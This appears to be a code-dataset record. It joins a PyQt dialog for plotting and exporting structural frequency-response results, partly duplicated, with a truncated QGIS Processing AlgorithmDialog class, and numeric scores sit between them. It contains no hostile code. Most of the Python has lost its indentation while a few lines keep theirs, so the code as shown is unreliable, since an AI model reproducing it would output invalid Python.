def choose_path_import_results(self):
        self.import_path, _ = QFileDialog.getOpenFileName(None, 'Open file', self.userPath, 'Files (*.dat *.csv)')
self.import_name = basename(self.import_path)
self.lineEdit_ImportResultsPath.setText(str(self.import_path))
def ImportResults(self):
try:
skiprows = int(self.lineEdit_skiprows.text())
self.imported_data = np.loadtxt(self.import_path, delimiter=",", skiprows=skiprows)
self.legend_imported = "imported data: "+ basename(self.import_path).split(".")[0]
self.tabWidget_plot_results.setCurrentWidget(self.tab_plot)
title = "Information"
message = "The results have been imported."
PrintMessageInput([title, message, window_title2])
except Exception as e:
title = "ERROR WHILE LOADING TABLE"
message = [str(e) + " It is recommended to skip the header rows."]
PrintMessageInput([title, message[0], window_title1])
return
def choose_path_export_results(self):
self.save_path = QFileDialog.getExistingDirectory(None, 'Choose a folder to export the results', self.userPath)
self.save_name = basename(self.save_path)
self.lineEdit_SaveResultsPath.setText(str(self.save_path))
def check(self, export=False):
lineEdit_nodeID = self.lineEdit_nodeID.text()
stop, self.node_ID = self.before_run.check_input_NodeID(lineEdit_nodeID, single_ID=True)
if stop:
return True
self.localDof = None
if self.SingleDiff:
_unit_label = "m/s"
elif self.DoubleDiff:
_unit_label = "m/s²"
else:
_unit_label = "m"
if self.radioButton_ux.isChecked():
self.localDof = 0
self.localdof_label = "Ux"
self.unit_label = _unit_label
if self.radioButton_uy.isChecked():
self.localDof = 1
self.localdof_label = "Uy"
self.unit_label = _unit_label
if self.radioButton_uz.isChecked():
self.localDof = 2
self.localdof_label = "Uz"
self.unit_label = _unit_label
        # rotational DOFs report rad-based units, so refresh the unit label before their checks
        if self.SingleDiff:
            _unit_label = "rad/s"
        elif self.DoubleDiff:
            _unit_label = "rad/s²"
        else:
            _unit_label = "rad"
        if self.radioButton_rx.isChecked():
            self.localDof = 3
            self.localdof_label = "Rx"
            self.unit_label = _unit_label
        if self.radioButton_ry.isChecked():
            self.localDof = 4
            self.localdof_label = "Ry"
            self.unit_label = _unit_label
        if self.radioButton_rz.isChecked():
            self.localDof = 5
            self.localdof_label = "Rz"
            self.unit_label = _unit_label
if not export:
self.plot()
return False
def ExportResults(self):
if self.lineEdit_FileName.text() != "":
if self.save_path != "":
self.export_path_folder = self.save_path + "/"
else:
title = "None folder selected"
message = "Plese, choose a folder before trying export the results."
PrintMessageInput([title, message, window_title1])
return
else:
title = "Empty file name"
message = "Inform a file name before trying export the results."
PrintMessageInput([title, message, window_title1])
return
if self.check(export=True):
return
freq = self.frequencies
self.export_path = self.export_path_folder + self.lineEdit_FileName.text() + ".dat"
response = self.get_response()
if self.save_Absolute:
header = ("Frequency[Hz], Real part [{}], Imaginary part [{}], Absolute [{}]").format(self.unit_label, self.unit_label, self.unit_label)
data_to_export = np.array([freq, np.real(response), np.imag(response), np.abs(response)]).T
elif self.save_Real_Imaginary:
header = ("Frequency[Hz], Real part [{}], Imaginary part [{}]").format(self.unit_label, self.unit_label)
data_to_export = np.array([freq, np.real(response), np.imag(response)]).T
np.savetxt(self.export_path, data_to_export, delimiter=",", header=header)
title = "Information"
message = "The results have been exported."
PrintMessageInput([title, message, window_title2])
def get_response(self):
response = get_structural_frf(self.preprocessor, self.solution, self.node_ID, self.localDof)
if self.SingleDiff:
output_data = response*(1j*2*np.pi)*self.frequencies
elif self.DoubleDiff:
output_data = response*((1j*2*np.pi*self.frequencies)**2)
else:
output_data = response
return output_data
def plot(self):
fig = plt.figure(figsize=[12,7])
ax = fig.add_subplot(1,1,1)
frequencies = self.frequencies
response = self.get_response()
if self.imported_data is not None:
data = self.imported_data
imported_Xvalues = data[:,0]
if self.plotAbs:
imported_Yvalues = np.abs(data[:,1] + 1j*data[:,2])
elif self.plotReal:
imported_Yvalues = data[:,1]
elif self.plotImag:
imported_Yvalues = data[:,2]
if self.plotAbs:
response = np.abs(response)
ax.set_ylabel(("Structural Response - Absolute [{}]").format(self.unit_label), fontsize = 14, fontweight = 'bold')
if not float(0) in response:
if self.imported_data is None:
ax.set_yscale('log', nonposy='clip')
else:
if not float(0) in imported_Yvalues:
ax.set_yscale('log', nonposy='clip')
elif self.plotReal:
response = np.real(response)
ax.set_ylabel(("Structural Response - Real [{}]").format(self.unit_label), fontsize = 14, fontweight = 'bold')
elif self.plotImag:
response = np.imag(response)
ax.set_ylabel(("Structural Response - Imaginary [{}]").format(self.unit_label), fontsize = 14, fontweight = 'bold')
#cursor = Cursor(ax)
cursor = SnaptoCursor(ax, frequencies, response, self.cursor)
plt.connect('motion_notify_event', cursor.mouse_move)
legend_label = "Response {} at node {}".format(self.localdof_label, self.node_ID)
if self.imported_data is None:
if float(0) in response or self.plotReal or self.plotImag:
if float(0) in response[1:] or self.plotReal or self.plotImag:
first_plot, = plt.plot(frequencies, response, color=[1,0,0], linewidth=2, label=legend_label)
else:
first_plot, = plt.semilogy(frequencies[1:], response[1:], color=[1,0,0], linewidth=2, label=legend_label)
else:
first_plot, = plt.semilogy(frequencies, response, color=[1,0,0], linewidth=2, label=legend_label)
_legends = plt.legend(handles=[first_plot], labels=[legend_label], loc='upper right')
else:
if float(0) in response or float(0) in imported_Yvalues or self.plotReal or self.plotImag:
if float(0) in response[1:] or float(0) in imported_Yvalues[1:] or self.plotReal or self.plotImag:
first_plot, = plt.plot(frequencies, response, color=[1,0,0], linewidth=2)
second_plot, = plt.plot(imported_Xvalues, imported_Yvalues, color=[0,0,1], linewidth=1, linestyle="--")
else:
first_plot, = plt.semilogy(frequencies[1:], response[1:], color=[1,0,0], linewidth=2, label=legend_label)
second_plot, = plt.semilogy(imported_Xvalues[1:], imported_Yvalues[1:], color=[0,0,1], linewidth=1, linestyle="--")
else:
first_plot, = plt.semilogy(frequencies, response, color=[1,0,0], linewidth=2, label=legend_label)
second_plot, = plt.semilogy(imported_Xvalues, imported_Yvalues, color=[0,0,1], linewidth=1, linestyle="--")
_legends = plt.legend(handles=[first_plot, second_plot], labels=[legend_label, self.legend_imported], loc='upper right')
plt.gca().add_artist(_legends)
ax.set_title(('STRUCTURAL FREQUENCY RESPONSE - {}').format(self.analysisMethod.upper()), fontsize = 16, fontweight = 'bold')
ax.set_xlabel(('Frequency [Hz]'), fontsize = 14, fontweight = 'bold')
plt.show()
|
data/user_input/plots/structural/plotStructuralFrequencyResponseInput.py
|
from PyQt5.QtWidgets import QLineEdit, QDialog, QFileDialog, QWidget, QTreeWidget, QToolButton, QRadioButton, QMessageBox, QTreeWidgetItem, QTabWidget, QLabel, QCheckBox, QPushButton, QSpinBox
from os.path import basename
from PyQt5.QtGui import QIcon
from PyQt5.QtGui import QColor, QBrush
from PyQt5.QtCore import Qt
from PyQt5 import uic
import configparser
import os
import matplotlib.pyplot as plt
import numpy as np
from pulse.postprocessing.plot_structural_data import get_structural_frf
from data.user_input.project.printMessageInput import PrintMessageInput
window_title1 = "ERROR MESSAGE"
window_title2 = "WARNING MESSAGE"
class SnaptoCursor(object):
def __init__(self, ax, x, y, show_cursor):
self.ax = ax
self.x = x
self.y = y
self.show_cursor = show_cursor
if show_cursor:
self.vl = self.ax.axvline(x=np.min(x), ymin=np.min(y), color='k', alpha=0.3, label='_nolegend_') # the vertical line
self.hl = self.ax.axhline(color='k', alpha=0.3, label='_nolegend_') # the horizontal line
self.marker, = ax.plot(x[0], y[0], markersize=4, marker="s", color=[0,0,0], zorder=3)
# self.marker.set_label("x: %1.2f // y: %4.2e" % (self.x[0], self.y[0]))
# plt.legend(handles=[self.marker], loc='lower left', title=r'$\bf{Cursor}$ $\bf{coordinates:}$')
def mouse_move(self, event):
if self.show_cursor:
if not event.inaxes: return
x, y = event.xdata, event.ydata
if x>=np.max(self.x): return
indx = np.searchsorted(self.x, [x])[0]
x = self.x[indx]
y = self.y[indx]
self.vl.set_xdata(x)
self.hl.set_ydata(y)
self.marker.set_data([x],[y])
self.marker.set_label("x: %1.2f // y: %4.2e" % (x, y))
plt.legend(handles=[self.marker], loc='lower left', title=r'$\bf{Cursor}$ $\bf{coordinates:}$')
self.ax.figure.canvas.draw_idle()
class PlotStructuralFrequencyResponseInput(QDialog):
def __init__(self, project, opv, analysisMethod, frequencies, solution, *args, **kwargs):
super().__init__(*args, **kwargs)
uic.loadUi('data/user_input/ui/Plots/Results/Structural/plotStructuralFrequencyResponseInput.ui', self)
icons_path = 'data\\icons\\'
self.icon = QIcon(icons_path + 'pulse.png')
self.setWindowIcon(self.icon)
self.setWindowFlags(Qt.WindowStaysOnTopHint)
self.setWindowModality(Qt.WindowModal)
self.opv = opv
self.opv.setInputObject(self)
self.list_node_IDs = self.opv.getListPickedPoints()
self.projec = project
self.preprocessor = project.preprocessor
self.before_run = self.preprocessor.get_model_checks()
self.nodes = self.preprocessor.nodes
self.analysisMethod = analysisMethod
self.frequencies = frequencies
self.solution = solution
self.userPath = os.path.expanduser('~')
self.save_path = ""
self.node_ID = 0
self.imported_data = None
self.localDof = None
self.lineEdit_nodeID = self.findChild(QLineEdit, 'lineEdit_nodeID')
self.lineEdit_FileName = self.findChild(QLineEdit, 'lineEdit_FileName')
self.lineEdit_ImportResultsPath = self.findChild(QLineEdit, 'lineEdit_ImportResultsPath')
self.lineEdit_SaveResultsPath = self.findChild(QLineEdit, 'lineEdit_SaveResultsPath')
self.toolButton_ChooseFolderImport = self.findChild(QToolButton, 'toolButton_ChooseFolderImport')
self.toolButton_ChooseFolderImport.clicked.connect(self.choose_path_import_results)
self.toolButton_ChooseFolderExport = self.findChild(QToolButton, 'toolButton_ChooseFolderExport')
self.toolButton_ChooseFolderExport.clicked.connect(self.choose_path_export_results)
self.toolButton_ExportResults = self.findChild(QToolButton, 'toolButton_ExportResults')
self.toolButton_ExportResults.clicked.connect(self.ExportResults)
self.toolButton_ResetPlot = self.findChild(QToolButton, 'toolButton_ResetPlot')
self.toolButton_ResetPlot.clicked.connect(self.reset_imported_data)
self.lineEdit_skiprows = self.findChild(QSpinBox, 'spinBox')
self.checkBox_cursor = self.findChild(QCheckBox, 'checkBox_cursor')
self.cursor = self.checkBox_cursor.isChecked()
self.checkBox_cursor.clicked.connect(self.update_cursor)
self.radioButton_ux = self.findChild(QRadioButton, 'radioButton_ux')
self.radioButton_uy = self.findChild(QRadioButton, 'radioButton_uy')
self.radioButton_uz = self.findChild(QRadioButton, 'radioButton_uz')
self.radioButton_rx = self.findChild(QRadioButton, 'radioButton_rx')
self.radioButton_ry = self.findChild(QRadioButton, 'radioButton_ry')
self.radioButton_rz = self.findChild(QRadioButton, 'radioButton_rz')
self.Ux = self.radioButton_ux.isChecked()
self.Uy = self.radioButton_uy.isChecked()
self.Uz = self.radioButton_uz.isChecked()
self.Rx = self.radioButton_rx.isChecked()
self.Ry = self.radioButton_ry.isChecked()
self.Rz = self.radioButton_rz.isChecked()
self.radioButton_plotAbs = self.findChild(QRadioButton, 'radioButton_plotAbs')
self.radioButton_plotReal = self.findChild(QRadioButton, 'radioButton_plotReal')
self.radioButton_plotImag = self.findChild(QRadioButton, 'radioButton_plotImag')
self.radioButton_plotAbs.clicked.connect(self.radioButtonEvent_YAxis)
self.radioButton_plotReal.clicked.connect(self.radioButtonEvent_YAxis)
self.radioButton_plotImag.clicked.connect(self.radioButtonEvent_YAxis)
self.plotAbs = self.radioButton_plotAbs.isChecked()
self.plotReal = self.radioButton_plotReal.isChecked()
self.plotImag = self.radioButton_plotImag.isChecked()
self.radioButton_Absolute = self.findChild(QRadioButton, 'radioButton_Absolute')
self.radioButton_Real_Imaginary = self.findChild(QRadioButton, 'radioButton_Real_Imaginary')
self.radioButton_Absolute.clicked.connect(self.radioButtonEvent_save_data)
self.radioButton_Real_Imaginary.clicked.connect(self.radioButtonEvent_save_data)
self.save_Absolute = self.radioButton_Absolute.isChecked()
self.save_Real_Imaginary = self.radioButton_Real_Imaginary.isChecked()
self.radioButton_NoneDiff = self.findChild(QRadioButton, 'radioButton_NoneDiff')
self.radioButton_SingleDiff = self.findChild(QRadioButton, 'radioButton_SingleDiff')
self.radioButton_DoubleDiff = self.findChild(QRadioButton, 'radioButton_DoubleDiff')
self.radioButton_NoneDiff.clicked.connect(self.radioButtonEvent_modify_spectrum)
self.radioButton_SingleDiff.clicked.connect(self.radioButtonEvent_modify_spectrum)
self.radioButton_DoubleDiff.clicked.connect(self.radioButtonEvent_modify_spectrum)
self.NoneDiff = self.radioButton_NoneDiff.isChecked()
self.SingleDiff = self.radioButton_SingleDiff.isChecked()
self.DoubleDiff = self.radioButton_DoubleDiff.isChecked()
self.tabWidget_plot_results = self.findChild(QTabWidget, "tabWidget_plot_results")
self.tab_plot = self.tabWidget_plot_results.findChild(QWidget, "tab_plot")
self.pushButton_AddImportedPlot = self.findChild(QPushButton, 'pushButton_AddImportedPlot')
self.pushButton_AddImportedPlot.clicked.connect(self.ImportResults)
self.pushButton = self.findChild(QPushButton, 'pushButton')
self.pushButton.clicked.connect(self.check)
self.writeNodes(self.list_node_IDs)
self.exec_()
def update_cursor(self):
self.cursor = self.checkBox_cursor.isChecked()
def reset_imported_data(self):
self.imported_data = None
title = "Information"
message = "The plot data has been reseted."
PrintMessageInput([title, message, window_title2])
def writeNodes(self, list_node_ids):
text = ""
for node in list_node_ids:
text += "{}, ".format(node)
self.lineEdit_nodeID.setText(text)
def update(self):
self.list_node_IDs = self.opv.getListPickedPoints()
if self.list_node_IDs != []:
self.writeNodes(self.list_node_IDs)
def keyPressEvent(self, event):
if event.key() == Qt.Key_Enter or event.key() == Qt.Key_Return:
self.check()
elif event.key() == Qt.Key_Escape:
self.close()
def radioButtonEvent_YAxis(self):
self.plotAbs = self.radioButton_plotAbs.isChecked()
self.plotReal = self.radioButton_plotReal.isChecked()
self.plotImag = self.radioButton_plotImag.isChecked()
def radioButtonEvent_save_data(self):
self.save_Absolute = self.radioButton_Absolute.isChecked()
self.save_Real_Imaginary = self.radioButton_Real_Imaginary.isChecked()
def radioButtonEvent_modify_spectrum(self):
self.NoneDiff = self.radioButton_NoneDiff.isChecked()
self.SingleDiff = self.radioButton_SingleDiff.isChecked()
self.DoubleDiff = self.radioButton_DoubleDiff.isChecked()
def choose_path_import_results(self):
        self.import_path, _ = QFileDialog.getOpenFileName(None, 'Open file', self.userPath, 'Files (*.dat *.csv)')
self.import_name = basename(self.import_path)
self.lineEdit_ImportResultsPath.setText(str(self.import_path))
def ImportResults(self):
try:
skiprows = int(self.lineEdit_skiprows.text())
self.imported_data = np.loadtxt(self.import_path, delimiter=",", skiprows=skiprows)
self.legend_imported = "imported data: "+ basename(self.import_path).split(".")[0]
self.tabWidget_plot_results.setCurrentWidget(self.tab_plot)
title = "Information"
message = "The results have been imported."
PrintMessageInput([title, message, window_title2])
except Exception as e:
title = "ERROR WHILE LOADING TABLE"
message = [str(e) + " It is recommended to skip the header rows."]
PrintMessageInput([title, message[0], window_title1])
return
def choose_path_export_results(self):
self.save_path = QFileDialog.getExistingDirectory(None, 'Choose a folder to export the results', self.userPath)
self.save_name = basename(self.save_path)
self.lineEdit_SaveResultsPath.setText(str(self.save_path))
def check(self, export=False):
lineEdit_nodeID = self.lineEdit_nodeID.text()
stop, self.node_ID = self.before_run.check_input_NodeID(lineEdit_nodeID, single_ID=True)
if stop:
return True
self.localDof = None
if self.SingleDiff:
_unit_label = "m/s"
elif self.DoubleDiff:
_unit_label = "m/s²"
else:
_unit_label = "m"
if self.radioButton_ux.isChecked():
self.localDof = 0
self.localdof_label = "Ux"
self.unit_label = _unit_label
if self.radioButton_uy.isChecked():
self.localDof = 1
self.localdof_label = "Uy"
self.unit_label = _unit_label
if self.radioButton_uz.isChecked():
self.localDof = 2
self.localdof_label = "Uz"
self.unit_label = _unit_label
        # rotational DOFs report rad-based units, so refresh the unit label before their checks
        if self.SingleDiff:
            _unit_label = "rad/s"
        elif self.DoubleDiff:
            _unit_label = "rad/s²"
        else:
            _unit_label = "rad"
        if self.radioButton_rx.isChecked():
            self.localDof = 3
            self.localdof_label = "Rx"
            self.unit_label = _unit_label
        if self.radioButton_ry.isChecked():
            self.localDof = 4
            self.localdof_label = "Ry"
            self.unit_label = _unit_label
        if self.radioButton_rz.isChecked():
            self.localDof = 5
            self.localdof_label = "Rz"
            self.unit_label = _unit_label
if not export:
self.plot()
return False
def ExportResults(self):
if self.lineEdit_FileName.text() != "":
if self.save_path != "":
self.export_path_folder = self.save_path + "/"
else:
title = "None folder selected"
message = "Plese, choose a folder before trying export the results."
PrintMessageInput([title, message, window_title1])
return
else:
title = "Empty file name"
message = "Inform a file name before trying export the results."
PrintMessageInput([title, message, window_title1])
return
if self.check(export=True):
return
freq = self.frequencies
self.export_path = self.export_path_folder + self.lineEdit_FileName.text() + ".dat"
response = self.get_response()
if self.save_Absolute:
header = ("Frequency[Hz], Real part [{}], Imaginary part [{}], Absolute [{}]").format(self.unit_label, self.unit_label, self.unit_label)
data_to_export = np.array([freq, np.real(response), np.imag(response), np.abs(response)]).T
elif self.save_Real_Imaginary:
header = ("Frequency[Hz], Real part [{}], Imaginary part [{}]").format(self.unit_label, self.unit_label)
data_to_export = np.array([freq, np.real(response), np.imag(response)]).T
np.savetxt(self.export_path, data_to_export, delimiter=",", header=header)
title = "Information"
message = "The results have been exported."
PrintMessageInput([title, message, window_title2])
def get_response(self):
response = get_structural_frf(self.preprocessor, self.solution, self.node_ID, self.localDof)
if self.SingleDiff:
output_data = response*(1j*2*np.pi)*self.frequencies
elif self.DoubleDiff:
output_data = response*((1j*2*np.pi*self.frequencies)**2)
else:
output_data = response
return output_data
def plot(self):
fig = plt.figure(figsize=[12,7])
ax = fig.add_subplot(1,1,1)
frequencies = self.frequencies
response = self.get_response()
if self.imported_data is not None:
data = self.imported_data
imported_Xvalues = data[:,0]
if self.plotAbs:
imported_Yvalues = np.abs(data[:,1] + 1j*data[:,2])
elif self.plotReal:
imported_Yvalues = data[:,1]
elif self.plotImag:
imported_Yvalues = data[:,2]
if self.plotAbs:
response = np.abs(response)
ax.set_ylabel(("Structural Response - Absolute [{}]").format(self.unit_label), fontsize = 14, fontweight = 'bold')
if not float(0) in response:
if self.imported_data is None:
ax.set_yscale('log', nonposy='clip')
else:
if not float(0) in imported_Yvalues:
ax.set_yscale('log', nonposy='clip')
elif self.plotReal:
response = np.real(response)
ax.set_ylabel(("Structural Response - Real [{}]").format(self.unit_label), fontsize = 14, fontweight = 'bold')
elif self.plotImag:
response = np.imag(response)
ax.set_ylabel(("Structural Response - Imaginary [{}]").format(self.unit_label), fontsize = 14, fontweight = 'bold')
#cursor = Cursor(ax)
cursor = SnaptoCursor(ax, frequencies, response, self.cursor)
plt.connect('motion_notify_event', cursor.mouse_move)
legend_label = "Response {} at node {}".format(self.localdof_label, self.node_ID)
if self.imported_data is None:
if float(0) in response or self.plotReal or self.plotImag:
if float(0) in response[1:] or self.plotReal or self.plotImag:
first_plot, = plt.plot(frequencies, response, color=[1,0,0], linewidth=2, label=legend_label)
else:
first_plot, = plt.semilogy(frequencies[1:], response[1:], color=[1,0,0], linewidth=2, label=legend_label)
else:
first_plot, = plt.semilogy(frequencies, response, color=[1,0,0], linewidth=2, label=legend_label)
_legends = plt.legend(handles=[first_plot], labels=[legend_label], loc='upper right')
else:
if float(0) in response or float(0) in imported_Yvalues or self.plotReal or self.plotImag:
if float(0) in response[1:] or float(0) in imported_Yvalues[1:] or self.plotReal or self.plotImag:
first_plot, = plt.plot(frequencies, response, color=[1,0,0], linewidth=2)
second_plot, = plt.plot(imported_Xvalues, imported_Yvalues, color=[0,0,1], linewidth=1, linestyle="--")
else:
first_plot, = plt.semilogy(frequencies[1:], response[1:], color=[1,0,0], linewidth=2, label=legend_label)
second_plot, = plt.semilogy(imported_Xvalues[1:], imported_Yvalues[1:], color=[0,0,1], linewidth=1, linestyle="--")
else:
first_plot, = plt.semilogy(frequencies, response, color=[1,0,0], linewidth=2, label=legend_label)
second_plot, = plt.semilogy(imported_Xvalues, imported_Yvalues, color=[0,0,1], linewidth=1, linestyle="--")
_legends = plt.legend(handles=[first_plot, second_plot], labels=[legend_label, self.legend_imported], loc='upper right')
plt.gca().add_artist(_legends)
ax.set_title(('STRUCTURAL FREQUENCY RESPONSE - {}').format(self.analysisMethod.upper()), fontsize = 16, fontweight = 'bold')
ax.set_xlabel(('Frequency [Hz]'), fontsize = 14, fontweight = 'bold')
plt.show()
| 0.560253 | 0.234024 |
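Note on the entry above: get_response() differentiates the displacement FRF in the frequency domain, so the single- and double-differentiation options return velocity and acceleration spectra. A minimal NumPy sketch of that step follows; the frequency axis and FRF values are made-up placeholders, only the operation matches the code.
import numpy as np
# placeholder inputs: a frequency axis in Hz and a complex displacement FRF sampled on it
frequencies = np.linspace(0.0, 100.0, 201)
displacement = (1.0 + 1.0j) * np.ones_like(frequencies, dtype=complex)
# same operations as get_response(): multiply by j*2*pi*f once for velocity, twice for acceleration
velocity = displacement * (1j * 2 * np.pi * frequencies)
acceleration = displacement * (1j * 2 * np.pi * frequencies) ** 2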
__author__ = '<NAME>'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, <NAME>'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '176c06ceefb5f555205e72b20c962740cc0ec183'
import os
from pprint import pformat
import time
from qgis.PyQt.QtCore import QCoreApplication, Qt
from qgis.PyQt.QtWidgets import QMessageBox, QPushButton, QSizePolicy, QDialogButtonBox
from qgis.PyQt.QtGui import QColor, QPalette
from qgis.core import (Qgis,
QgsProject,
QgsApplication,
QgsProcessingUtils,
QgsProcessingParameterDefinition,
QgsProcessingAlgRunnerTask,
QgsProcessingOutputHtml,
QgsProcessingParameterVectorDestination,
QgsProcessingOutputLayerDefinition,
QgsProcessingParameterFeatureSink,
QgsProcessingParameterRasterDestination,
QgsProcessingAlgorithm,
QgsProcessingParameters,
QgsProxyProgressTask,
QgsTaskManager)
from qgis.gui import (QgsGui,
QgsMessageBar,
QgsProcessingAlgorithmDialogBase)
from qgis.utils import iface
from processing.core.ProcessingLog import ProcessingLog
from processing.core.ProcessingConfig import ProcessingConfig
from processing.core.ProcessingResults import resultsList
from processing.gui.ParametersPanel import ParametersPanel
from processing.gui.BatchAlgorithmDialog import BatchAlgorithmDialog
from processing.gui.AlgorithmDialogBase import AlgorithmDialogBase
from processing.gui.AlgorithmExecutor import executeIterating, execute, execute_in_place
from processing.gui.Postprocessing import handleAlgorithmResults
from processing.gui.wrappers import WidgetWrapper
from processing.tools import dataobjects
class AlgorithmDialog(QgsProcessingAlgorithmDialogBase):
def __init__(self, alg, in_place=False, parent=None):
super().__init__(parent)
self.feedback_dialog = None
self.in_place = in_place
self.active_layer = None
self.context = None
self.feedback = None
self.setAlgorithm(alg)
self.setMainWidget(self.getParametersPanel(alg, self))
if not self.in_place:
self.runAsBatchButton = QPushButton(QCoreApplication.translate("AlgorithmDialog", "Run as Batch Process…"))
self.runAsBatchButton.clicked.connect(self.runAsBatch)
self.buttonBox().addButton(self.runAsBatchButton, QDialogButtonBox.ResetRole) # reset role to ensure left alignment
else:
self.active_layer = iface.activeLayer()
self.runAsBatchButton = None
has_selection = self.active_layer and (self.active_layer.selectedFeatureCount() > 0)
self.buttonBox().button(QDialogButtonBox.Ok).setText(QCoreApplication.translate("AlgorithmDialog", "Modify Selected Features")
if has_selection else QCoreApplication.translate("AlgorithmDialog", "Modify All Features"))
self.buttonBox().button(QDialogButtonBox.Close).setText(QCoreApplication.translate("AlgorithmDialog", "Cancel"))
self.setWindowTitle(self.windowTitle() + ' | ' + self.active_layer.name())
def getParametersPanel(self, alg, parent):
return ParametersPanel(parent, alg, self.in_place)
def runAsBatch(self):
self.close()
dlg = BatchAlgorithmDialog(self.algorithm().create(), parent=iface.mainWindow())
dlg.show()
dlg.exec_()
def setParameters(self, parameters):
self.mainWidget().setParameters(parameters)
def getParameterValues(self):
parameters = {}
if self.mainWidget() is None:
return parameters
for param in self.algorithm().parameterDefinitions():
if param.flags() & QgsProcessingParameterDefinition.FlagHidden:
continue
if not param.isDestination():
if self.in_place and param.name() == 'INPUT':
parameters[param.name()] = self.active_layer
continue
try:
wrapper = self.mainWidget().wrappers[param.name()]
except KeyError:
continue
# For compatibility with 3.x API, we need to check whether the wrapper is
# the deprecated WidgetWrapper class. If not, it's the newer
# QgsAbstractProcessingParameterWidgetWrapper class
# TODO QGIS 4.0 - remove
if issubclass(wrapper.__class__, WidgetWrapper):
widget = wrapper.widget
else:
widget = wrapper.wrappedWidget()
if widget is None:
continue
value = wrapper.parameterValue()
parameters[param.name()] = value
if not param.checkValueIsAcceptable(value):
raise AlgorithmDialogBase.InvalidParameterValue(param, widget)
else:
if self.in_place and param.name() == 'OUTPUT':
parameters[param.name()] = 'memory:'
continue
dest_project = None
if not param.flags() & QgsProcessingParameterDefinition.FlagHidden and \
isinstance(param, (QgsProcessingParameterRasterDestination,
QgsProcessingParameterFeatureSink,
QgsProcessingParameterVectorDestination)):
if self.mainWidget().checkBoxes[param.name()].isChecked():
dest_project = QgsProject.instance()
widget = self.mainWidget().outputWidgets[param.name()]
value = widget.getValue()
if value and isinstance(value, QgsProcessingOutputLayerDefinition):
value.destinationProject = dest_project
if value:
parameters[param.name()] = value
if param.isDestination():
context = dataobjects.createContext()
ok, error = self.algorithm().provider().isSupportedOutputValue(value, param, context)
if not ok:
raise AlgorithmDialogBase.InvalidOutputExtension(widget, error)
return self.algorithm().preprocessParameters(parameters)
def runAlgorithm(self):
self.feedback = self.createFeedback()
self.context = dataobjects.createContext(self.feedback)
checkCRS = ProcessingConfig.getSetting(ProcessingConfig.WARN_UNMATCHING_CRS)
try:
parameters = self.getParameterValues()
if checkCRS and not self.algorithm().validateInputCrs(parameters, self.context):
reply = QMessageBox.question(self, self.tr("Unmatching CRS's"),
self.tr('Parameters do not all use the same CRS. This can '
'cause unexpected results.\nDo you want to '
'continue?'),
QMessageBox.Yes | QMessageBox.No,
QMessageBox.No)
if reply == QMessageBox.No:
return
ok, msg = self.algorithm().checkParameterValues(parameters, self.context)
if not ok:
QMessageBox.warning(
self, self.tr('Unable to execute algorithm'), msg)
return
self.runButton().setEnabled(False)
self.cancelButton().setEnabled(False)
buttons = self.mainWidget().iterateButtons
self.iterateParam = None
for i in range(len(list(buttons.values()))):
button = list(buttons.values())[i]
if button.isChecked():
self.iterateParam = list(buttons.keys())[i]
break
self.clearProgress()
self.feedback.pushVersionInfo(self.algorithm().provider())
self.setProgressText(QCoreApplication.translate('AlgorithmDialog', 'Processing algorithm…'))
self.setInfo(
QCoreApplication.translate('AlgorithmDialog', '<b>Algorithm \'{0}\' starting…</b>').format(self.algorithm().displayName()), escapeHtml=False)
self.feedback.pushInfo(self.tr('Input parameters:'))
display_params = []
for k, v in parameters.items():
display_params.append("'" + k + "' : " + self.algorithm().parameterDefinition(k).valueAsPythonString(v, self.context))
self.feedback.pushCommandInfo('{ ' + ', '.join(display_params) + ' }')
self.feedback.pushInfo('')
start_time = time.time()
if self.iterateParam:
# Make sure the Log tab is visible before executing the algorithm
try:
self.showLog()
self.repaint()
except:
pass
self.cancelButton().setEnabled(self.algorithm().flags() & QgsProcessingAlgorithm.FlagCanCancel)
if executeIterating(self.algorithm(), parameters, self.iterateParam, self.context, self.feedback):
self.feedback.pushInfo(
self.tr('Execution completed in {0:0.2f} seconds').format(time.time() - start_time))
self.cancelButton().setEnabled(False)
self.finish(True, parameters, self.context, self.feedback)
else:
self.cancelButton().setEnabled(False)
self.resetGui()
else:
command = self.algorithm().asPythonCommand(parameters, self.context)
if command:
ProcessingLog.addToLog(command)
QgsGui.instance().processingRecentAlgorithmLog().push(self.algorithm().id())
self.cancelButton().setEnabled(self.algorithm().flags() & QgsProcessingAlgorithm.FlagCanCancel)
def on_complete(ok, results):
if ok:
self.feedback.pushInfo(self.tr('Execution completed in {0:0.2f} seconds').format(time.time() - start_time))
self.feedback.pushInfo(self.tr('Results:'))
self.feedback.pushCommandInfo(pformat(results))
else:
self.feedback.reportError(
self.tr('Execution failed after {0:0.2f} seconds').format(time.time() - start_time))
self.feedback.pushInfo('')
if self.feedback_dialog is not None:
self.feedback_dialog.close()
self.feedback_dialog.deleteLater()
self.feedback_dialog = None
self.cancelButton().setEnabled(False)
if not self.in_place:
self.finish(ok, results, self.context, self.feedback)
elif ok:
self.close()
self.feedback = None
self.context = None
if not self.in_place and not (self.algorithm().flags() & QgsProcessingAlgorithm.FlagNoThreading):
# Make sure the Log tab is visible before executing the algorithm
self.showLog()
task = QgsProcessingAlgRunnerTask(self.algorithm(), parameters, self.context, self.feedback)
if task.isCanceled():
on_complete(False, {})
else:
task.executed.connect(on_complete)
self.setCurrentTask(task)
else:
self.proxy_progress = QgsProxyProgressTask(QCoreApplication.translate("AlgorithmDialog", "Executing “{}”").format(self.algorithm().displayName()))
QgsApplication.taskManager().addTask(self.proxy_progress)
self.feedback.progressChanged.connect(self.proxy_progress.setProxyProgress)
self.feedback_dialog = self.createProgressDialog()
self.feedback_dialog.show()
if self.in_place:
ok, results = execute_in_place(self.algorithm(), parameters, self.context, self.feedback)
else:
ok, results = execute(self.algorithm(), parameters, self.context, self.feedback)
self.feedback.progressChanged.disconnect()
self.proxy_progress.finalize(ok)
on_complete(ok, results)
except AlgorithmDialogBase.InvalidParameterValue as e:
try:
self.buttonBox().accepted.connect(lambda e=e:
e.widget.setPalette(QPalette()))
palette = e.widget.palette()
palette.setColor(QPalette.Base, QColor(255, 255, 0))
e.widget.setPalette(palette)
except:
pass
self.messageBar().clearWidgets()
self.messageBar().pushMessage("", self.tr("Wrong or missing parameter value: {0}").format(e.parameter.description()),
level=Qgis.Warning, duration=5)
except AlgorithmDialogBase.InvalidOutputExtension as e:
try:
self.buttonBox().accepted.connect(lambda e=e:
e.widget.setPalette(QPalette()))
palette = e.widget.palette()
palette.setColor(QPalette.Base, QColor(255, 255, 0))
e.widget.setPalette(palette)
except:
pass
